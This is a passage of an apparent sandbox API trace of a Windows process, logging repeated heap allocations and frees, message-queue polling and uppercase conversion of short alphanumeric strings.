0x2a71b68 [0210.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71af8 [0210.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0210.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0210.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a48 [0210.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0210.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0210.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6a8 [0210.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0210.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0210.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0210.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0210.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xfb7e) returned 0x2acdf88 [0210.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0210.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0210.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0210.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0210.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0210.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0210.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0210.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0210.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0210.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0210.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0210.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0210.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0210.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0210.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0210.104] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0210.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0210.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0210.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0210.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0210.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0210.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0210.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0210.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0210.104] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0210.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0210.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0210.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0210.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0210.104] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0210.104] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0210.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0210.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0210.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0210.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0210.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0210.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0210.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0210.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0210.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0210.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0210.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0210.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.105] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0210.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0210.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0210.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0210.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0210.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0210.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0210.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0210.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0210.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0210.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0210.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0210.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0210.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0210.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0210.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.106] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0210.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0210.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0210.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0210.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0210.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0210.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0210.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0210.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0210.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0210.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0210.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0210.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0210.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0210.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.106] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0210.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0210.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0210.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0210.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0210.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0210.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0210.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0210.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0210.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0210.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0210.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0210.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0210.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0210.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.107] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0210.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0210.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0210.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0210.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0210.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0210.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0210.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0210.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0210.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0210.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0210.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0210.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0210.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0210.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0210.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.108] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0210.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0210.108] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0210.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0210.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0210.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9c0 [0210.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0210.108] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0210.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0210.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0210.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0210.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0210.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0210.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0210.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0210.108] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0210.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0210.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0210.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0210.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0210.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0210.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0210.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0210.109] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0210.109] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0210.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0210.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0210.109] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0210.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae70 [0210.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74628 [0210.109] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0210.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0210.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0210.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0210.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0210.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0210.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0210.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0210.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0210.110] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0210.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0210.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0210.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0210.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0210.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0210.110] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0210.110] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0210.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0210.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0210.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0210.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0210.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0210.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0210.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0210.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0210.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0210.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0210.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74628 | out: hHeap=0x2af0000) returned 1 [0210.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0210.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0210.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0210.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0210.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0210.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0210.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0210.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0210.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0210.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0210.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0210.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0210.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 